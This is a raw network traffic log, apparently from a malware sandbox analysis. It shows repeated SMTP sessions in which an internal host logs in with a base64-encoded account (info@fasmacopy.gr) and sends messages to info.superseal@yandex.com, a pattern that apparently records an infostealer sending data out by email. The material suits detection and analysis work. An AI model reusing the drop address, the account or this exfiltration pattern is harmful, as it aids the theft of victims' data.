Jul 1, 2024 20:27:09.495465040 CEST	587	49739	79.170.44.32	192.168.2.4	250-mta2.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:27:09.495635986 CEST	49739	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:27:09.684573889 CEST	587	49739	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:27:09.876250029 CEST	587	49739	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:27:09.876403093 CEST	49739	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:27:10.065507889 CEST	587	49739	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:27:10.073518038 CEST	49739	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:27:10.270013094 CEST	587	49739	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:27:10.277075052 CEST	49739	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:27:10.463644028 CEST	587	49739	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:27:10.493001938 CEST	49739	587	192.168.2.4	79.170.44.32	.
Jul 1, 2024 20:27:11.276200056 CEST	587	49739	79.170.44.32	192.168.2.4	250 OK id=1sOLk6-0000000DCGR-1aE4
Jul 1, 2024 20:27:12.314333916 CEST	587	49739	79.170.44.32	192.168.2.4	250 OK id=1sOLk6-0000000DCGR-1aE4
Jul 1, 2024 20:27:12.315871000 CEST	587	49739	79.170.44.32	192.168.2.4	250 OK id=1sOLk6-0000000DCGR-1aE4
Jul 1, 2024 20:27:12.316076040 CEST	587	49739	79.170.44.32	192.168.2.4	250 OK id=1sOLk6-0000000DCGR-1aE4
Jul 1, 2024 20:27:19.827333927 CEST	49739	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:27:20.215081930 CEST	587	49739	79.170.44.32	192.168.2.4	221 mta2.hi.local closing connection
Jul 1, 2024 20:27:21.185137987 CEST	587	49740	79.170.44.32	192.168.2.4	220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:21 +0100
Jul 1, 2024 20:27:21.185250044 CEST	49740	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:27:21.374058008 CEST	587	49740	79.170.44.32	192.168.2.4	250-mta2.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:27:21.374209881 CEST	49740	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:27:21.562297106 CEST	587	49740	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:27:21.754947901 CEST	587	49740	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:27:21.755070925 CEST	49740	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:27:21.943399906 CEST	587	49740	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:27:21.943536043 CEST	49740	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:27:22.140707970 CEST	587	49740	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:27:22.145041943 CEST	49740	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:27:22.436301947 CEST	587	49740	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:27:23.068694115 CEST	587	49740	79.170.44.32	192.168.2.4	250 OK id=1sOLkI-0000000DCM0-127b
Jul 1, 2024 20:27:32.946715117 CEST	49740	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:27:33.354957104 CEST	587	49740	79.170.44.32	192.168.2.4	221 mta2.hi.local closing connection
Jul 1, 2024 20:27:33.954459906 CEST	587	49741	79.170.44.32	192.168.2.4	220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:33 +0100
Jul 1, 2024 20:27:33.954596996 CEST	49741	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:27:34.147423029 CEST	587	49741	79.170.44.32	192.168.2.4	250-mta2.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:27:34.153537989 CEST	49741	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:27:34.339615107 CEST	587	49741	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:27:34.530988932 CEST	587	49741	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:27:34.532859087 CEST	49741	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:27:34.718312025 CEST	587	49741	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:27:34.720889091 CEST	49741	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:27:35.546674967 CEST	587	49742	79.170.44.32	192.168.2.4	220 mta3.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:35 +0100
Jul 1, 2024 20:27:35.546822071 CEST	49742	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:27:35.735109091 CEST	587	49742	79.170.44.32	192.168.2.4	250-mta3.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:27:35.735434055 CEST	49742	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:27:35.923638105 CEST	587	49742	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:27:36.117608070 CEST	587	49742	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:27:36.121424913 CEST	49742	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:27:36.310538054 CEST	587	49742	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:27:36.310800076 CEST	49742	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:27:36.511528015 CEST	587	49742	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:27:36.511806011 CEST	49742	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:27:36.705600023 CEST	587	49742	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:27:37.346040964 CEST	587	49742	79.170.44.32	192.168.2.4	250 OK id=1sOLkW-0000000ERZf-2ZRW
Jul 1, 2024 20:27:46.840518951 CEST	49742	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:27:47.230300903 CEST	587	49742	79.170.44.32	192.168.2.4	221 mta3.hi.local closing connection
Jul 1, 2024 20:27:48.020229101 CEST	587	49743	79.170.44.32	192.168.2.4	220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:47 +0100
Jul 1, 2024 20:27:48.020366907 CEST	49743	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:27:48.212055922 CEST	587	49743	79.170.44.32	192.168.2.4	250-mta2.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:27:48.212327003 CEST	49743	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:27:48.403609037 CEST	587	49743	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:27:48.600611925 CEST	587	49743	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:27:48.603403091 CEST	49743	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:27:48.813664913 CEST	587	49743	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:27:48.813854933 CEST	49743	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:27:49.017674923 CEST	587	49743	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:27:49.017973900 CEST	49743	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:27:49.212156057 CEST	587	49743	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:27:49.236172915 CEST	49743	587	192.168.2.4	79.170.44.32	.
Jul 1, 2024 20:27:49.831792116 CEST	587	49743	79.170.44.32	192.168.2.4	250 OK id=1sOLkj-0000000DCaZ-0Uj8
Jul 1, 2024 20:27:51.809463978 CEST	49743	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:27:52.205099106 CEST	587	49743	79.170.44.32	192.168.2.4	221 mta2.hi.local closing connection
Jul 1, 2024 20:27:52.827761889 CEST	587	49744	79.170.44.32	192.168.2.4	220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:52 +0100
Jul 1, 2024 20:27:52.827930927 CEST	49744	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:27:53.032391071 CEST	587	49744	79.170.44.32	192.168.2.4	250-mta4.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:27:53.032619953 CEST	49744	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:27:53.224463940 CEST	587	49744	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:27:53.422904015 CEST	587	49744	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:27:53.423062086 CEST	49744	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:27:53.615833044 CEST	587	49744	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:27:53.615979910 CEST	49744	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:27:53.815978050 CEST	587	49744	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:27:53.816160917 CEST	49744	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:27:54.008660078 CEST	587	49744	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:27:54.627106905 CEST	587	49744	79.170.44.32	192.168.2.4	250 OK id=1sOLkn-0000000A2g4-3qSW
Jul 1, 2024 20:27:59.008552074 CEST	49744	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:27:59.403178930 CEST	587	49744	79.170.44.32	192.168.2.4	221 mta4.hi.local closing connection
Jul 1, 2024 20:28:00.150458097 CEST	587	49745	79.170.44.32	192.168.2.4	220 mta3.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:00 +0100
Jul 1, 2024 20:28:00.150966883 CEST	49745	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:28:00.337574005 CEST	587	49745	79.170.44.32	192.168.2.4	250-mta3.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:28:00.337758064 CEST	49745	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:28:00.522360086 CEST	587	49745	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:28:00.711060047 CEST	587	49745	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:28:00.712580919 CEST	49745	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:28:00.898240089 CEST	587	49745	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:28:00.901314974 CEST	49745	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:28:01.095300913 CEST	587	49745	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:28:01.095416069 CEST	49745	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:28:01.279144049 CEST	587	49745	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:28:01.908507109 CEST	587	49745	79.170.44.32	192.168.2.4	250 OK id=1sOLkv-0000000ERlv-0oBA
Jul 1, 2024 20:28:13.475375891 CEST	49745	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:28:13.862019062 CEST	587	49745	79.170.44.32	192.168.2.4	221 mta3.hi.local closing connection
Jul 1, 2024 20:28:14.490386009 CEST	587	49746	79.170.44.32	192.168.2.4	220 mta1.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:14 +0100
Jul 1, 2024 20:28:14.490833044 CEST	49746	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:28:14.685704947 CEST	587	49746	79.170.44.32	192.168.2.4	250-mta1.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:28:14.686976910 CEST	49746	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:28:14.880176067 CEST	587	49746	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:28:15.079988956 CEST	587	49746	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:28:15.080185890 CEST	49746	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:28:15.275403976 CEST	587	49746	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:28:15.275614023 CEST	49746	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:28:15.475378990 CEST	587	49746	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:28:15.475521088 CEST	49746	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:28:15.672533035 CEST	587	49746	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:28:16.601747990 CEST	587	49747	79.170.44.32	192.168.2.4	220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:16 +0100
Jul 1, 2024 20:28:16.601891994 CEST	49747	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:28:16.807550907 CEST	587	49747	79.170.44.32	192.168.2.4	250-mta4.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:28:16.807796001 CEST	49747	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:28:16.999671936 CEST	587	49747	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:28:17.196358919 CEST	587	49747	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:28:17.196614981 CEST	49747	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:28:17.385592937 CEST	587	49747	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:28:17.385744095 CEST	49747	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:28:17.586522102 CEST	587	49747	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:28:17.586688042 CEST	49747	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:28:17.781030893 CEST	587	49747	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:28:17.822735071 CEST	49747	587	192.168.2.4	79.170.44.32	.
Jul 1, 2024 20:28:18.412240982 CEST	587	49747	79.170.44.32	192.168.2.4	250 OK id=1sOLlB-0000000A2si-2sDD
Jul 1, 2024 20:28:34.151602983 CEST	49747	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:28:34.555474043 CEST	587	49747	79.170.44.32	192.168.2.4	221 mta4.hi.local closing connection
Jul 1, 2024 20:28:35.168035030 CEST	587	49748	79.170.44.32	192.168.2.4	220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:35 +0100
Jul 1, 2024 20:28:35.168200970 CEST	49748	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:28:35.358902931 CEST	587	49748	79.170.44.32	192.168.2.4	250-mta4.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:28:35.359085083 CEST	49748	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:28:35.550868988 CEST	587	49748	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:28:35.745289087 CEST	587	49748	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:28:35.745492935 CEST	49748	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:28:35.935261965 CEST	587	49748	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:28:35.935412884 CEST	49748	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:28:36.135417938 CEST	587	49748	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:28:36.142765999 CEST	49748	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:28:36.335314035 CEST	587	49748	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:28:36.373159885 CEST	49748	587	192.168.2.4	79.170.44.32	.
Jul 1, 2024 20:28:36.972570896 CEST	587	49748	79.170.44.32	192.168.2.4	250 OK id=1sOLlU-0000000A31G-11Q4
Jul 1, 2024 20:28:50.991621017 CEST	49748	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:28:51.383745909 CEST	587	49748	79.170.44.32	192.168.2.4	221 mta4.hi.local closing connection
Jul 1, 2024 20:28:52.580348969 CEST	587	49750	79.170.44.32	192.168.2.4	220 mta3.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:52 +0100
Jul 1, 2024 20:28:52.580627918 CEST	49750	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:28:52.770576954 CEST	587	49750	79.170.44.32	192.168.2.4	250-mta3.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:28:52.770760059 CEST	49750	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:28:52.962213993 CEST	587	49750	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:28:53.162456989 CEST	587	49750	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:28:53.162611961 CEST	49750	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:28:53.352729082 CEST	587	49750	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:28:53.352868080 CEST	49750	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:28:54.391041040 CEST	587	49751	79.170.44.32	192.168.2.4	220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:54 +0100
Jul 1, 2024 20:28:54.391273975 CEST	49751	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:28:54.722778082 CEST	587	49751	79.170.44.32	192.168.2.4	250-mta4.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:28:54.723278999 CEST	49751	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:28:54.906481981 CEST	587	49751	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:28:55.095117092 CEST	587	49751	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:28:55.095407963 CEST	49751	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:28:55.278851986 CEST	587	49751	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:28:55.279068947 CEST	49751	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:28:55.472872972 CEST	587	49751	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:28:55.473031044 CEST	49751	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:28:55.662342072 CEST	587	49751	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:28:56.308284998 CEST	587	49751	79.170.44.32	192.168.2.4	250 OK id=1sOLln-0000000A3BT-2Ofc
Jul 1, 2024 20:29:05.053231955 CEST	49751	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:29:05.467690945 CEST	587	49751	79.170.44.32	192.168.2.4	221 mta4.hi.local closing connection
Jul 1, 2024 20:29:06.132132053 CEST	587	49752	79.170.44.32	192.168.2.4	220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:06 +0100
Jul 1, 2024 20:29:06.132278919 CEST	49752	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:29:06.336431980 CEST	587	49752	79.170.44.32	192.168.2.4	250-mta4.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:29:06.339493990 CEST	49752	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:29:06.675451040 CEST	587	49752	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:29:06.870318890 CEST	587	49752	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:29:06.870841026 CEST	49752	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:29:07.062038898 CEST	587	49752	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:29:07.062885046 CEST	49752	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:29:07.271917105 CEST	587	49752	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:29:07.272062063 CEST	49752	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:29:07.464664936 CEST	587	49752	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:29:08.091321945 CEST	587	49752	79.170.44.32	192.168.2.4	250 OK id=1sOLlz-0000000A3H9-1Yun
Jul 1, 2024 20:29:09.642345905 CEST	49752	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:29:10.034501076 CEST	587	49752	79.170.44.32	192.168.2.4	221 mta4.hi.local closing connection
Jul 1, 2024 20:29:10.628614902 CEST	587	49753	79.170.44.32	192.168.2.4	220 mta1.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:10 +0100
Jul 1, 2024 20:29:10.628832102 CEST	49753	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:29:10.815536022 CEST	587	49753	79.170.44.32	192.168.2.4	250-mta1.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:29:10.815969944 CEST	49753	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:29:11.001250029 CEST	587	49753	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:29:11.188497066 CEST	587	49753	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:29:11.188714981 CEST	49753	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:29:11.372123957 CEST	587	49753	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:29:11.372385025 CEST	49753	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:29:11.614816904 CEST	587	49753	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:29:11.614967108 CEST	49753	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:29:11.831549883 CEST	587	49753	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:29:12.636617899 CEST	587	49753	79.170.44.32	192.168.2.4	250 OK id=1sOLm3-00000004Bje-2zMB
Jul 1, 2024 20:29:18.418917894 CEST	49753	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:29:18.807950974 CEST	587	49753	79.170.44.32	192.168.2.4	221 mta1.hi.local closing connection
Jul 1, 2024 20:29:19.414141893 CEST	587	49754	79.170.44.32	192.168.2.4	220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:19 +0100
Jul 1, 2024 20:29:19.418207884 CEST	49754	587	192.168.2.4	79.170.44.32	EHLO 579569
Jul 1, 2024 20:29:19.606580973 CEST	587	49754	79.170.44.32	192.168.2.4	250-mta2.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:29:19.607073069 CEST	49754	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:29:19.806065083 CEST	587	49754	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:29:19.999017000 CEST	587	49754	79.170.44.32	192.168.2.4	235 Authentication succeeded
Jul 1, 2024 20:29:19.999155045 CEST	49754	587	192.168.2.4	79.170.44.32	MAIL FROM:<info@fasmacopy.gr>
Jul 1, 2024 20:29:20.188519955 CEST	587	49754	79.170.44.32	192.168.2.4	250 OK
Jul 1, 2024 20:29:20.188666105 CEST	49754	587	192.168.2.4	79.170.44.32	RCPT TO:<info.superseal@yandex.com>
Jul 1, 2024 20:29:20.392357111 CEST	587	49754	79.170.44.32	192.168.2.4	250 Accepted
Jul 1, 2024 20:29:20.395040035 CEST	49754	587	192.168.2.4	79.170.44.32	DATA
Jul 1, 2024 20:29:20.583072901 CEST	587	49754	79.170.44.32	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jul 1, 2024 20:29:21.193829060 CEST	587	49754	79.170.44.32	192.168.2.4	250 OK id=1sOLmC-0000000DDKH-24oy
Jul 1, 2024 20:29:24.612020969 CEST	49754	587	192.168.2.4	79.170.44.32	QUIT
Jul 1, 2024 20:29:25.021388054 CEST	587	49754	79.170.44.32	192.168.2.4	221 mta2.hi.local closing connection
Jul 1, 2024 20:29:25.655849934 CEST	587	49755	79.170.44.32	192.168.2.4	220 mta1.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:25 +0100
Jul 1, 2024 20:29:25.656055927 CEST	49755	587	192.168.2.4	79.170.44.32	EHLO 579569
